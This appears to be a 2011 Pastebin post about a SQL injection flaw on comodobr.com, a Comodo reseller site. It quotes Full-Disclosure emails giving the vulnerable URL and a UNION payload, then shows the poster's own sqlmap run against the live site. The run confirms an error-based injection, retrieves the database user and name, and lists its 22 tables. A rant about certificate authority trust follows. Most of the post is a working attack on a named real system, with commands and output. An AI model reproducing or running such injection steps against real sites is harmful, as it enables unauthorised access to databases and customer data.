Advertisement
Nicolai

Comodogate v2

May 22nd, 2011
7,518
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.38 KB | None | 0 0
  1. Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP;
  2. Sun, 22 May 2011 11:20:54 PDT
  3. X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
  4. Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
  5. From: Hgkdfhklj Jdhglkjfdhg <[email protected]>
  6. X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
  7. Subject: [Full-disclosure] comodobr.com sqli
  8.  
  9.  
  10. vulnerable link:
  11. https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL
  12. SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -
  13.  
  14. http://pastebin.com/9qwdL1pA
  15.  
  16.  
  17. _______________________________________________
  18. Full-Disclosure - We believe in it.
  19. Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  20. Hosted and sponsored by Secunia - http://secunia.com/
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30. ---------------------------------------------------------------------
  31.  
  32.  
  33.  
  34.  
  35. PS C:\Python27> nslookup 199.48.147.35
  36. Server: google-public-dns-a.google.com
  37. Address: 8.8.8.8
  38.  
  39. Name: tor-exit-router35-readme.formlessnetworking.net
  40. Address: 199.48.147.35
  41.  
  42. >>> You're not going to find him... <<<
  43. >>> Let's check the host: <<<>>><<<>>><
  44.  
  45. PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard
  46.  
  47. sqlmap/0.9 - automatic SQL injection and database takeover tool
  48. http://sqlmap.sourceforge.net
  49.  
  50. [*] starting at: 21:00:00
  51.  
  52. Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
  53. POST data (--data) [Enter for None]:
  54. Injection difficulty (--level/--risk). Please choose:
  55. [1] Normal (default)
  56. [2] Medium
  57. [3] Hard
  58. > 1
  59. Enumeration (--banner/--current-user/etc). Please choose:
  60. [1] Basic (default)
  61. [2] Smart
  62. [3] All
  63. > 1
  64.  
  65. sqlmap is running, please wait..
  66.  
  67. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  68. ---
  69. Place: GET
  70. Parameter: prod
  71. Type: error-based
  72. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  73. Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198)
  74. THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  75. ---
  76.  
  77. [21:00:00] [INFO] retrieved: 5.0.91-community-log
  78.  
  79. web application technology: PHP 5.2.6, Apache 2.0.63
  80. back-end DBMS: MySQL 5.0
  81. banner: '5.0.91-community-log'
  82.  
  83. [21:00:00] [INFO] retrieved: comodobr_site@localhost
  84. current user: 'comodobr_site@localhost'
  85.  
  86. [21:00:00] [INFO] retrieved: comodobr_comodobr
  87. current database: 'comodobr_comodobr'
  88.  
  89. current user is DBA: 'False'
  90.  
  91.  
  92. [*] shutting down at: 21:00:00
  93.  
  94. PS C:\Python27>
  95.  
  96.  
  97. >>> Looks real <<<>>><<<>>><<<>>><<<>>>
  98. >>> Let's see the inside of the db: <<<
  99.  
  100.  
  101. web application technology: PHP 5.2.6, Apache 2.0.63
  102. back-end DBMS: MySQL 5.0
  103. banner: '5.0.91-community-log'
  104. current user: 'comodobr_site@localhost'
  105. current database: 'comodobr_comodobr'
  106. current user is DBA: 'False'
  107.  
  108. [21:00:00] [INFO] retrieved: comodobr_comodobr
  109. [21:00:00] [INFO] retrieved: comodo_boleto
  110. [21:00:00] [INFO] retrieved: comodobr_comodobr
  111. [21:00:00] [INFO] retrieved: comodo_boleto_associa
  112. [21:00:00] [INFO] retrieved: comodobr_comodobr
  113. [21:00:00] [INFO] retrieved: comodo_boleto_categoria
  114. [21:00:00] [INFO] retrieved: comodobr_comodobr
  115. [21:00:00] [INFO] retrieved: comodo_boleto_importado
  116. [21:00:00] [INFO] retrieved: comodobr_comodobr
  117. [21:00:00] [INFO] retrieved: comodo_boleto_status
  118. [21:00:00] [INFO] retrieved: comodobr_comodobr
  119. [21:00:00] [INFO] retrieved: comodo_confirm_pago
  120. [21:00:00] [INFO] retrieved: comodobr_comodobr
  121. [21:00:00] [INFO] retrieved: comodo_contab
  122. [21:00:00] [INFO] retrieved: comodobr_comodobr
  123. [21:00:00] [INFO] retrieved: comodo_expected_delivery_time
  124. [21:00:00] [INFO] retrieved: comodobr_comodobr
  125. [21:00:00] [INFO] retrieved: comodo_hosting_contas
  126. [21:00:00] [INFO] retrieved: comodobr_comodobr
  127. [21:00:00] [INFO] retrieved: comodo_meios_pago
  128. [21:00:00] [INFO] retrieved: comodobr_comodobr
  129. [21:00:00] [INFO] retrieved: comodo_pedido_status
  130. [21:00:00] [INFO] retrieved: comodobr_comodobr
  131. [21:00:00] [INFO] retrieved: comodo_pedido_status_codes
  132. [21:00:00] [INFO] retrieved: comodobr_comodobr
  133. [21:00:00] [INFO] retrieved: comodo_pedidos
  134. [21:00:00] [INFO] retrieved: comodobr_comodobr
  135. [21:00:00] [INFO] retrieved: comodo_pedidos_historico
  136. [21:00:00] [INFO] retrieved: comodobr_comodobr
  137. [21:00:00] [INFO] retrieved: comodo_prod_grupos
  138. [21:00:00] [INFO] retrieved: comodobr_comodobr
  139. [21:00:00] [INFO] retrieved: comodo_prods
  140. [21:00:00] [INFO] retrieved: comodobr_comodobr
  141. [21:00:00] [INFO] retrieved: comodo_resellers
  142. [21:00:00] [INFO] retrieved: comodobr_comodobr
  143. [21:00:00] [INFO] retrieved: comodo_server_software
  144. [21:00:00] [INFO] retrieved: comodobr_comodobr
  145. [21:00:00] [INFO] retrieved: comodo_users
  146. [21:00:00] [INFO] retrieved: comodobr_comodobr
  147. [21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
  148. [21:00:00] [INFO] retrieved: comodobr_comodobr
  149. [21:00:00] [INFO] retrieved: comodo_webhostreport_item
  150. [21:00:00] [INFO] retrieved: comodobr_comodobr
  151. [21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
  152. Database: comodobr_comodobr
  153. [22 tables]
  154. +-------------------------------+
  155. | comodo_boleto |
  156. | comodo_boleto_associa |
  157. | comodo_boleto_categoria |
  158. | comodo_boleto_importado |
  159. | comodo_boleto_status |
  160. | comodo_confirm_pago |
  161. | comodo_contab |
  162. | comodo_expected_delivery_time |
  163. | comodo_hosting_contas |
  164. | comodo_meios_pago |
  165. | comodo_pedido_status |
  166. | comodo_pedido_status_codes |
  167. | comodo_pedidos |
  168. | comodo_pedidos_historico |
  169. | comodo_prod_grupos |
  170. | comodo_prods |
  171. | comodo_resellers |
  172. | comodo_server_software |
  173. | comodo_users |
  174. | comodo_vw_crm_clientes |
  175. | comodo_webhostreport_item |
  176. | comodo_webhostreport_subitem |
  177. +-------------------------------+
  178.  
  179.  
  180. [*] shutting down at: 21:00:00
  181.  
  182. PS C:\Python27>
  183.  
  184.  
  185. When are comodo going to fix this? How come comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CA's, when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next?
  186.  
  187. GET YOUR SHIT TOGETHER.
  188.  
  189.  
  190.  
  191.  
  192. EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles
  193. I've just checked his claims, which was true. Everyone can claim that they hacked comodo, but that the vulnerable was fixed, so all I have done is open sqlmap and tested :-)
  194.  
  195. Also here's a new response:
  196.  
  197.  
  198.  
  199.  
  200. Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP;
  201. Tue, 24 May 2011 14:58:39 PDT
  202. X-Mailer: YahooMailWebService/0.8.111.303096
  203. Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
  204. From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com>
  205. Subject: [Full-disclosure] My comments on comodobr.com
  206.  
  207.  
  208. I have to agree with Comodo president and CEO, Melih Abdulhayoglu.
  209.  
  210. In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli.
  211. However the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten own their own security. further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.
  212.  
  213. Just my 50 cents
  214.  
  215. [Edit]
  216. The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSR's and client info shouldn't be "readily available" as this.
  217. No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own.
  218. That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.
  219.  
  220.  
  221.  
  222. http://pastebin.com/MFSUdCnk
  223.  
  224. _______________________________________________
  225. Full-Disclosure - We believe in it.
  226. Hosted and sponsored by Secunia - http://secunia.com/
  227.  
  228.  
  229.  
  230.  
  231.  
  232.  
  233. PS C:\Users\Nicolai> nslookup 199.48.147.35
  234. Server: google-public-dns-a.google.com
  235. Address: 8.8.8.8
  236.  
  237. Name: tor-exit-router35-readme.formlessnetworking.net
  238. Address: 199.48.147.35
  239.  
  240. PS C:\Users\Nicolai>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement